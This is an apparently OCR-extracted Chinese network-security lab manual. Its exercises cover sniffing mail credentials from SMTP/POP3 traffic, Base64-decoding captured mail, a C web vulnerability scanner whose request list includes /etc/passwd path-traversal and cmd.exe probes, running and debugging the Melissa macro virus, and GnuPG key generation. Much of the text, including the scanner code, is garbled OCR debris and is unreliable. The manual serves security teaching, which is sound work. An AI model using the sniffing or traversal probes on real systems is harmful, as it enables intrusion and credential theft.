图2-5：捕获的用户名及密码二.邮件传输中获取邮件帐号及邮件正文.获取邮件账号(1)主机A配置OutlookExpress(参见附录A—OutlookExpress配置方法)。图2-6：主机A配置OutlookExpress(2)主机B明文嗅探主机B启动”协议分析器”，单击工具栏U按钮，在“协议过滤”中设置过滤模式为仅捕获主机A与邮件服务器之间的SMTP、POP3数据包(主机A的IP<->邮件服务器IP)。新建捕获窗口，点击“选择过滤器”按钮，确定过滤信息。在新建捕获窗口工具栏中点击”开始捕获数据包”按钮，开始捕获数据包。如图2-7,2-8,2-9所示：定曳过猛器k|JCFrPIGMPTCP榴妾］网揖地址I数据模式□□回」，；/尹FTPCcrtralFTPDataHTTP]MAPNetBtl式TCP)TELNETE}-.LOP迪KX)TPJCH3P毒咛二携作的…tn乱:9…另存为^…|图2-7定曳过猛器k|JCFrPIGMPTCP榴妾］网揖地址I数据模式□□回」，；/尹FTPCcrtralFTPDataHTTP]MAPNetBtl式TCP)TELNETE}-.LOP迪KX)TPJCH3P毒咛二携作的…tn乱:9…另存为^…|图2-7：定义过滤器协议类型定"a涛siK|瞧网和眦数据模式I版泡制 ]「浦俅旧地址英型(口：即可I默认LPZ.36.O,1L2 <--> 17Z,16.Q.33■=：-=<-><—>二一口<->姑卢|司村侬田捎| 崎.」|另有我⑸，，」图2-8：定义过滤器IP地址2L过滤器信思摘要图2-9：确定过滤信息按钮。(3)主机A使用OutlookExpress发送邮件给主机B,点击“发送/接收”按钮。(4)主机B分析采集到的数据包对过滤后的数据包进行分析，提取出帐户用户名和密码，以及邮件的主题。截获的帐户密码如图2-10所示：图2-10：提取帐户的密码.解析邮件正文（Base64解码）（1）在右侧会话交互图中，点击“Text_Data”会话帧（可能存在多个Text_Data会话帧，逐一查找），在中间详细解析树中定位到邮件头域（HeaderField）解析部分，找到“HeaderField=Content-Transfer-Encoding:base64,类似图2-11,定位Base64加密后的邮件密文。QHeaderField-Ji-nSMail-rriorityInrnalD|HeaderFieLd=Ji-fliiler:HILcroscftnitlcckExpressGHD3T90.1630I-QHeaderFi^Ld二kH由eOLEProduce!ByMicrosoftMineOLEVP-.Oh1030Header7luLd=Content_7r fer_Encoding:6bltL3HeaderFieLd=K-HI^IEAuloconvertedfronlu6bitbyCServer.ITelLabinQHeaderFieLi二HeaderrLel-l=UEFSdMdSEYEqaifl_2i：［=a^ir：zLj=.二I?1?二II ._ 上图2-11：定位邮件密文内容（Base64编码）（2）单击平台工具栏“Base64”按钮，打开BASE64编码转换工具。选择转换方向“BASE64->Content"，选择转换方式“文本直接转换”，将邮件正文（Base64编码）输入到“要转换的文本”域中，单击“转换”按钮，在“转换后的文本”域中查看邮件明文。如图2-12所示：

QqLxi军移换的文件的交件名：I 1_1沛投后的文件名：LJI语IS择管损才自修BA5EE4->Cwt5tCCoateat->■BASES1语此择沛投方式r文许辑想 *立本宜捱樽想方齐城的文本：邮] ?二1加EdH.MEYT如uELd㈠切后的文本：旦制|保存|IihIIdron^ran^Ld图2-12：编码转换实训三Web漏洞扫描器&【实训步骤】一.Web漏洞扫描程序设计编写Web漏洞扫描器WebScan探查远程服务器（主机）上可能存在的具有安全隐患的文件是否存在。WebScan默认提供了几个漏洞扫描，开发人员可以根据自己的需要增加漏洞扫描的数量。WebScan的实现较为简单，概括起来它主要完成下列四项工作：连接目标主机；向目标主机发送GET请求；接收目标返回的数据；根据返回数据判断探测目标是否存在。|开发流程如图20-3-1所示。

图3-1WebScan开发流程(1)单击工具栏“VC6”按钮，启动VC++。选择“File"l“OpenWorkspace…”加载工程文件“C:\ExpNIS\NetAD-Lab\Projects\WebScan\"，打开源文件。（2）调用WSAStartup函数，加载Winsock库（版本）。（3）创建流式套接字。（4）调用connect函数，尝试与目标端口80建立连接，若返回SOCKET_ERROR则表示目标端口关闭，否则目标端口开放。#（5）若目标端口80开放，调用send函数发送GET请求。（6）调用recv函数接收目标返回数据，若返回数据中包含HTTP/200OK信息，则表示探测漏洞存在。（7）调用closesocket函数，关闭套接字。（8）在退出程序前卸载winsock库。具体代码如图3-1，3-2所示：ttinclude<winsock.h>Upraginacnoment[1ib3"ws2_32_liti")intnaini(iintargc,char*argu[]){|ifCargcJ=2)<printf('LJspage1:scan[IPaddres£]\n");rcturn(l);structsoctiad[lr_inblah;structhu5teint*he;3slm口T*uisaoata;，冷啃骋:华P的塔加物Mm心版本之，2int1;VORDuUersionRequested;SOCKETsack;charLUFFL1UWI」；char犍苏门0]；ex[i]='get http/i.肌n\rr;ew[2]-"CET/bg.jpgHTTP/1.9\nXn";es[3]-"GET^bbs/index.a5pHTTF/1.B\n\n";ex[a]="GE7/upload.jsphttf^i.n\n\n"：ew[5]-"/../etc/pas5wdHTTP/1.0\n\n";px[^i]-'7sr.ripls/. ../uinnl/sysfpiu32/rLiiiil.^xp?i：+ilir-ti.HTTP/1.n\u\ii";ex[7]="/cgi-bin/test-cgi?*WTTP/1.a\n\n'';char*fn5g-"HTTP/1.1299OK";uUpr<,iiiiiRhi|iipsIpi1=I帕KFW(lRn(九？)；iF(USftStartupfullDrEianRcquostcd,printf("WinsachInitialisationrailedAn"!;PKlt(1);图31:具体代码esitdl;"t//在"t//在能蠲羁良仓呼融套跖sock=soeket(iiF_ihiETisocK_srREftr'ia0);blah-sin_Fapily-fiF_IHET;blah.sin_piDrt=htons(C9);blah_sLn_arldr_s_adtlr=inet_addr(argu[l]);printfC”目标主机粘argu[1]);if((tie=gotha5tbLlinaijre'(argv[1]))f=NULL){nemcpyt(char*)ftblah.siin_addr,s_addr.he->h_addr,he->b_lerjgthiJ;Bl写叫if((blah.5in_addr.5_ad(li'-inet_addr'fai-gu[1]!)--1)<wniiEjnuptj;for(i-1;i<7;if{for(i-1;i<7;if{迄收日任返回您无 日小一1280。唯息.则装，目标(漏洞)存在,〃任上处遍写代码•…if(connect(sock,(structsockdddr*)&bLahPsizeof(blah))=^0)<sendt5oclc,eK[i],5trlen(eM[i])f0);r?cu[£(]ckvbuFfpElzeaFfbufF)so);if(str5tr(tiuFFBFni5g)!-HJLL)<prlntfC^nFound:既八cx[i]);图32:具体代码(9)启动协议分析器捕获Http会话，执行编译成功的扫描器，效果如图33所示:

图3-3:WebScan执行效果实训四Outlook邮件病毒【实训步骤】[本练习主机A、B为一组，C、D为一组，E、F为一组。下面以主机A、B为例，说明实训步骤。首先使用“快照X”恢复Windows系统环境。一.观察病毒感染现象(1)配置Outlook2003,建立邮件帐户，如图4-1所示：图4-1：新建邮件帐户主机A、B配置Outlook2003(参见附录A—OutlookExpress配置方法)，建立邮件帐户。主机A打开OutLook2003,单击“文件”1“新建”1“联系人”，在右侧的“电子邮件”栏中填入主机B的电子邮件地址，单击左上方的“保存并关闭"完成联系人的添加。如图4-2所示：|

图4-2：添加联系人（2）查看病毒感染标记主机A打开注册表编辑器，查看'HKEY_CURRENT_USER\Software\Microsoft\Office\"项中是否有键名为“Melissa”，键值为“...byKwyjibo”的键没^^^。（3）设置发作条件观察病毒发作现象主机A单击工具栏“实训目录”按钮，进入邮件病毒实训目录。打开病毒文档，此时OutLook2003的安全机制会连续出现2个安全提示：“有一个程序正试图访问保存于Outlook的电子邮件地址。是否允许该操作……”，选中“允许访问”后单击“是”。“有一个程序正试图以您的名义自动发送电子邮件。是否允许该操作.•…”，单击“是”。*这样当前文档即被病毒自动发送给对方（当前日期数和当前时间分钟数相同时，如当前日期为11月8日即将当前时间的分钟数修改为08。则在文档中输出以下内容“Twenty-twopoints,plustriple-word-score,plusfiftypointsforusingallmy's'mouttahere."）。如图4-3和4-4所示：Microsoft□fficeOutlookA 有一个程序正试图访问保存于Outlook的电子邮件!\地址口是否允许该操偕如果对此感觉意外，这可能是由于病毒导致，您应选择“否”口图4-3：安全提示有一个程序正试图以您的名义自动发送电子邮件.是否允许该操作■?如果对此感觉意外，逮苗能是由于病毒导致，您应选择"否""■nnnnnnnnnninnnnn

是I忙二食算二二|帮助其I图4-4：安全提示（4）重新查看病毒感染标记主机A在注册表编辑器中按快捷键“F5”刷新查看，在“HKEY_CURRENT_USER\Software\Microsoft\Office\"项中是否会有键名为“Melissa”，键值为"...by吊.七。”的键有。如图4-5所示：文件〔已*图 收循央〔以帮助胆）lil-7jInternetMail-arriNews4|：lil-7jInternetMail-arriNews4|：2jJava州申二1蔺hd50ftMm第cnwntCt田」REDastarTTcMls山•二］RE5EtUP(ACME)由二1RECWPPS-OMutmedlaS-^JFfetCOE"ZJ即32d--IM±>adujp白.•二J&Fix屯」H.D名痂画盘四回|M4lss全数值名称氢I：数值数据W：LonrmnDuHwikWord图4-5：查看“Melissa”键（5）查看病毒邮件发作现象主机B打开Outlook2003，按“F9”键来接收被病毒发出的邮件，打开收件箱中的病毒邮件，双击附件名称，出现提示信息“想要打开文件还是想将它保存到计算机中”单击“打开”即出现前述Outlook2003安全提示，参照前述进行处理，病毒文档又将被发送给B的地址簿中前50位联系人。如图4-6和4-7所示：出现提示“文件已被感染”。

项中键名为“Melissa”，键值为"...byKwyjibo”的键。如图4-8所示:图4-8：删除“Melissa”键(3)调试代码感染病毒的主机在实训目录C:\ExpNIS\AntiVir-Lab\Virus\MailVirus\下新建一个任意文件名的Word文件。如图4-9所示：文曲口铜皆回/君®啖承闻讯口常秋州0后退，◎二f搜索工文件典|甲5X9区P|二匚:1日：网5高加荷_力中山绅密附西与群- 1 戈小I美坦 ［修改日期 ［同性竺忱竺,婀 ^LKB 2007^11-013^D ~•^J12^d0Cj ILKE： 阖ad文档 2014T-Z111：S5A图4-9：新建Word文件#打开新创建文档的VisualBasic编辑器，找到编辑器左上部”工程一Project”工具栏中的“Project(新建Word文件名)”［"MicrosoftWord”l“ThisDocument”对象，双击此对象打开编辑区并将病毒代码复制到此区域中，通过单击“调试”1“逐语句”或者按快捷键“F8”来逐句调试代码并配合代码注释了解其工作过程。如图4-10所示：

图4-10：调试代码在调试过程中，当出现提示信息“此时不能进入中断模式”时，单击“结束”重新进行调试。如图4-11所示：出现提示“此时不能进入中断模式”图4-11：出现提示信息重新开始调试后：查看病毒感染标记。观察MicrosoftWord对象名是否有变化。观察代码的运行路径是否有变化。在病毒代码中有部分被注释掉的语句，这些语句是病毒的自我保护措施，它们使病毒执行完操作后将自己删除。用户可以去掉注释，运行代码查看效果。如图4-12所示：MicrosoftWord对象名变为“Mellisa”。去掉代码注释，如图4-13所示：

图4-12：对象名变为“Mellisa图4-13：去掉注释代码图4-12：对象名变为“Mellisa图4-13：去掉注释代码实训五PGP应用【实训步骤】本练习主机A、B为一组，C、D为一组，E、F为一组。首先使用“快照X”恢复Windows系统环境。一.PGP安全通信&说明：实训应用PGP工具实现信息的安全通信，其实现流程为：本机首先生成公私钥对，并导出公钥给同组主机；在收到同组主机的公钥后将其导入到本机中，并利用其对文件进行加密；将加密后的密文传回给同组主机，本机利用自己的私钥对来自同组主机的密文进行解密。要求：应用PGP工具过程中所使用的用户名均为userGX格式，其中G为组编号(1-32),X为主机编号(A-F),如第2组主机D,其使用的用户名应为user2D。1.生成公私密钥（1）本机单击实训平台“GnuPG”工具按钮，进入工作目录，键入命令：gpg--gen-key开始生成公私钥对。期间gpg会依次询问如下信息：欲产生密钥种类（默认选择1）密钥大小（默认大小2048字节）密钥有效期限（默认选择0一永不过期）]具体步骤结果如图5-1所示:…£:'■WlhDO1132\Cnid.gM@-gpg—geiirkeyundericer-tainconditions..SbbCMfileCOPVTIIGfordetails.Plea-scselect式hatkindofke学spoilwant：1yMAandEIgaJi<a1<defanIt)12)MA(sign5>胞科Signwl”Molls*-&ielection?1PBAk£wa.iruillliavc1@24bits.ELG-EmdybEbDCween1924and4096bits1口risr.Wkiatkeysizedo劈口以wnt?调国46Rcauic.stcdhcsisiEris2EMIBbitsPleas'^^1)位cifyhen#long七h器人耳罩5huuId]□辟ua-lxd.0=diseemotesc^iris£ii》 1 u1K看看 in n dmy方KnXr - k日y exp松崎右 in n 原日日kg<n>n = k曰y in n njuoths<n>jr - Kg廿 expires in n yeai唱Keyisu^lidfor?<0>HeydocsnotCMQpirc nilIsthi-scorrect? ?V□ll[HEEdmti±黑弁IDfcaide-n-ki.Ey期11『hiy；thesaF-twiresznnstr'ULcfcx:the-llser1DfForatlijeEe.alHam日』ConffientandEna11和ddx日&£iothi君fDs?m："HfaiiiiP'ichHeineCDei* 好3<lheInpichl-ipLiLLe^seIdopfBde图5-1：开始生成公私钥对确定上述输入后进入步骤（2）操作。（2）生成用户标识，期间gpg会依次询问如下信息：Realname（用户名，请按本机的组编号和主机编号确定你的用户名）Emailaddress（Email地址，如）Common（注释信息，建议与用户名相同）|确定上述输入后，gpg会提示你将要生成的USER-ID,形如：user2D（user2D））键入“。”确定以上信息后，gpg需要一个密码来保护即将生成的用户私钥，为了方便记忆，我们选择密码与用户名相同。如图5-2所示：

图5-2：生成公私钥对(3)接下来gpg会根据以上信息生成公私密钥对，并将它们存放在 C:\DocumentsandSettings\Administrator\ApplicationData\gnupg目录下，名字分别为：和。〜具体步骤结果如图5-3和5-4所示:球至 融泊 应用地〕「说明」默认情况下ApplicationData目录是隐藏的，通过“资源浏览器”1“工具”菜单图5-2：生成公私钥对(3)接下来gpg会根据以上信息生成公私密钥对，并将它们存放在 C:\DocumentsandSettings\Administrator\ApplicationData\gnupg目录下，名字分别为：和。〜具体步骤结果如图5-3和5-4所示:球至 融泊 应用地〕「说明」默认情况下ApplicationData目录是隐藏的，通过“资源浏览器”1“工具”菜单1”文件夹选项”1“查看”选项卡，选中“显示所有文件和文件夹”项，即可显示隐藏的目录和文件。|应用到所百文件耍重查斯百丈伴巽雷)禀理至看|文件菜怨见机女件文件更视囱耳用力加■值5)|司旗设查回i.;lia件0I：兀三港三叵］UItI：可/件次。二京皿Im一天不『意面下”求斯克件夹的内容□说危呼可F：T『泉底＜•■江〔推荐O左三「力啰汗：『之：『上□京花书浑TW不言E三卡色相「1.可展.不劭：口：；“丁回n丘西一工一二审*在□H单也因负的•:•III◎,件立固_文件要造嗅位于所白支件和豆件先RealminiBi”&mBri.s.ildditrAisiE工uiiseir2fiBCSet：JL-adb>Cn'iwii£*userZAVouselectcdthiaUSEJR-IPs"1i-iserffl <user2ffl^CSeii«uier,lifetLflb>,RC^iciri3B加必m3耳^C^omnentp,工 二七？口VnLLRiEiisdaPa^spliiF«i^EtopFatECtywiuf1SGecretkey.胞needtogen«FAte3lotofrandombytes.Itisagoodideatopspfowotlheraction£tyj）日ontTieknyboardLmovet-tekwusc>utilizeChedisks>dupingtheppinemeneaatiom;thisgive占t力电^andoi'inunbe^X七11修¥净方口工盘bettieu85ha口岱喝 ^ainemctuigihenkr^py.4#4.##+##44.4####4.####+###4.4#4.4#434县4年小4,4__鼻4鼻4鼻34县4_县小鼻34县小4山44一土34县小鼻鼻4县县.鼻4县目-amdSettinkgsZflldjniinistratiQFZiRppl.icati由nIhaitd/giiiLipfrXfrHLi%tdlh.灯制；oarJtedultimate1^trustedJkeycrsatBdlamieisned.Tjig：CS/Dkiicuiwenitstra靠crenteiiSIPff=展望EWEBgSEpublicandsecpatM®neadCog白in。肚日匕。alotofpaimiioinhvCes.Itisagoodideat。pepfom归。rmtuther1action《七打旧也”thekeybo^rdl^it旧u1看themuiiis看声ntxlizethsdisks>duringtheprime（reriier'atimirii；tlii.^giuesttierduriidomnuFiih^rgrner-aToi*abetteiret9i^ne£^fainismoii0hEHitriMapy-.,+#+44-.餐4#**,44+4■4.鼻4#44■鼻县*#44■■鼻44餐*4._+4事上44■，444****#+4船上#「二EheckingtIlie-truisstdh：2 nieieded,.1cimmpl忠it史（si，neededlrPGPtrmisdisl:depths@amlid：131中口已电：9tiuist：0n.月底qOn.曲内呼 lu:L翦4”ELI目@6翦2012-fi6-2i如yflnyeo^iiit=7A6CCPF由EFD字UW0EfiST11788F联£@9EK25■u&EkWfh<uE@r2A>Mm/片上1宣曲QUS蜉即曹9:1fli>Natliadb）aEkiaj^^SEBfllK3201.2-H&-214-4-k-44+4444-l-B444-l-+-k-4-k-4491咱gpsrjiub图5-3